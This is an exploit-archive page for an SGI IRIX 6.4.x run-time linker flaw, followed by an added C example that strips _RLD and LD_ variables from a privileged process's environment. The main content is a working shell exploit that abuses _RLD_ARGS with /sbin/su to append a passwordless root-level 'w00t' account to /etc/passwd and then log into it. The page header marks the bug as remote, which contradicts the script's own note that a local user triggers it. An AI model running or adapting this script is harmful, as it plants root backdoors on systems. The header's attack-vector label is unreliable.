SGI IRIX 6.4.x Run-Time Linker Arbitrary File Creation

2019.04.29
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/bin/sh
# SGI IRIX <= 6.4.x run-time linker (rld) arbitrary file creation exploit
# =======================================================================
# The IRIX run-time linker on all versions prior to 6.5 does not properly
# scrub environment variables when executing binaries with privilege or
# capabilities. A malicious user can leverage this to create files as the
# "root" user and partially control the contents.
#
# -- HackerFantastic (https://hacker.house)
#
echo "echo w00t::0:0:greetz:/:/bin/csh >> /etc/passwd" > /tmp/.x.sh
chmod 755 /tmp/.x.sh
_RLD_ARGS="-log /.cshrc |/tmp/.x.sh" /sbin/su
last -3 root
echo "[ waiting 5mins for root to login..."
sleep 300
su - w00t
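The root cause named in the script's header is that rld honours _RLD_ARGS even when the binary runs with privilege. The following C code is an added example, not part of the original advisory and not IRIX source, showing the missing step: dropping linker-control variables from the environment before a privileged process acts on them. The prefix list and the function names are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Assumed deny-list: "_RLD" covers the _RLD_ARGS variable named in the
 * advisory; "LD_" is the analogous prefix on other run-time linkers. */
static const char *const LINKER_PREFIXES[] = { "_RLD", "LD_", NULL };

/* True when the process runs with more privilege than its invoker. */
int is_privileged(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/* Does a "NAME=value" entry start with a linker-control prefix? */
int is_linker_var(const char *entry)
{
    for (size_t i = 0; LINKER_PREFIXES[i] != NULL; i++)
        if (strncmp(entry, LINKER_PREFIXES[i], strlen(LINKER_PREFIXES[i])) == 0)
            return 1;
    return 0;
}

/* Compact envp in place, dropping linker-control variables.
 * A loader would call this whenever is_privileged() is true.
 * Returns the number of entries removed. */
int scrub_env(char **envp)
{
    int removed = 0;
    char **dst = envp;
    for (char **src = envp; *src != NULL; src++) {
        if (is_linker_var(*src))
            removed++;
        else
            *dst++ = *src;
    }
    *dst = NULL;
    return removed;
}

int main(void)
{
    /* Constructed sample environment, not captured from a real system. */
    char *env[] = { "HOME=/", "_RLD_ARGS=-log /tmp/example.log",
                    "PATH=/usr/bin", "LD_LIBRARY_PATH=/tmp", NULL };
    printf("privileged=%d removed=%d\n", is_privileged(), scrub_env(env));
    for (char **e = env; *e != NULL; e++)
        puts(*e);
    return 0;
}
```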



Copyright 2019, cxsecurity.com

 
